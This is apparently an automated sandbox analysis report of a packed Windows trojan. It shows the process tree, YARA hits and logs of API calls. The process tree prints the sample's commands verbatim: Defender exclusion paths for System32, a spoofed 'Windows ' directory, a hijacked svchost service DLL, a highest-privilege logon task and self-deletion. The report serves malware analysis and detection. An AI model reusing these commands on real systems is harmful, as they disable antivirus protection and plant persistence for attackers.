Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 26, 2024, 9:35 a.m.	Aug. 26, 2024, 9:40 a.m.

Size	14.5MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`43bce45d873189f9ae2767d89a1c46e0`
SHA256	`9ae4784f0b139619ca8fdadfa31b53b1cbf7cd2b45f74b7e4004e5a97e842291`
CRC32	`D9294A44`
ssdeep	`393216:4PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:4ITkS6`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature ftp_command - ftp command Malicious_Packer_Zero - Malicious Packer IsPE64 - (no description) Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

pyld611114.exe "C:\Users\test22\AppData\Local\Temp\pyld611114.exe"
292
- cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
  2120
  - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
    2180
- cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
  2452
  - usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
    2520
    - cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
      2720
      - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
        2780
    - cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
      2968
      - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
        3040
    - cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
      2112
    - cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
      2336
      - printui.exe "C:\Windows \System32\printui.exe"
        1688
        
        cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
        2632
        
        powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
        2740
        
        cmd.exe cmd.exe /c sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f && sc start x748413
        2088
        
        sc.exe sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
        2192
        
        reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f
        2012
        
        sc.exe sc start x748413
        2644
        
        cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
        536
        
        console_zero.exe "C:\Windows\System32\console_zero.exe"
        2964
        
        cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
        3056
        
        schtasks.exe schtasks /delete /tn "console_zero" /f
        1480
        
        cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        2116
        
        schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
        2972
        
        cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
        2988
        
        timeout.exe timeout /t 10 /nobreak
        948
    - cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
      2792
      - timeout.exe timeout /t 10 /nobreak
        2272
- cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\test22\AppData\Local\Temp\pyld611114.exe"
  2612
  - timeout.exe timeout /t 10 /nobreak
    2676

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (26 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 26, 2024, 9:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 26, 2024, 9:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2024, 9:36 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 26, 2024, 9:28 a.m.			0	0
IsDebuggerPresent Aug. 26, 2024, 9:29 a.m.			0	0
IsDebuggerPresent Aug. 26, 2024, 9:29 a.m.			0	0
IsDebuggerPresent Aug. 26, 2024, 9:29 a.m.			0	0
IsDebuggerPresent Aug. 26, 2024, 9:29 a.m.			0	0

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 26, 2024, 9:28 a.m.	buffer: Waiting for 10 console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:28 a.m.	buffer: seconds, press CTRL+C to quit ... console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: Waiting for 10 console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: seconds, press CTRL+C to quit ... console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: [SC] CreateService SUCCESS console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: SERVICE_NAME: x748413 TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x7d0 PID : 2628 FLAGS : console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: Waiting for 10 console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: seconds, press CTRL+C to quit ... console_handle: 0x0000000000000007	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: ERROR: console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 26, 2024, 9:36 a.m.	buffer: The system cannot find the file specified. console_handle: 0x000000000000000b	1	1
WriteConsoleW Aug. 26, 2024, 9:37 a.m.	buffer: SUCCESS: The scheduled task "console_zero" has successfully been created. console_handle: 0x0000000000000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 184 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000336ca0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293dd80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293dd80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293dd80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e090 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e090 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293ddf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293ddf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293ddf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293ddf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e330 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293ddf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293ddf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293ddf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e870 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e9c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e9c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e9c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e8e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e8e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000316800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000316800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000316b80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000316b80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000316b80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e1e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002961a70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002961a70 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002961e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000002961e60 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000000293e800 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000204bf0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b554ea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b554ea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey Aug. 26, 2024, 9:29 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b554ea0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 26, 2024, 9:28 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.fptable

Allocates read-write-execute memory (usually to unpack itself) (50 out of 700 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef34c1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3740000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3740000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3740000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3740000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3740000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3741000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3741000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3741000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3741000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef373e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002892000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002894000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
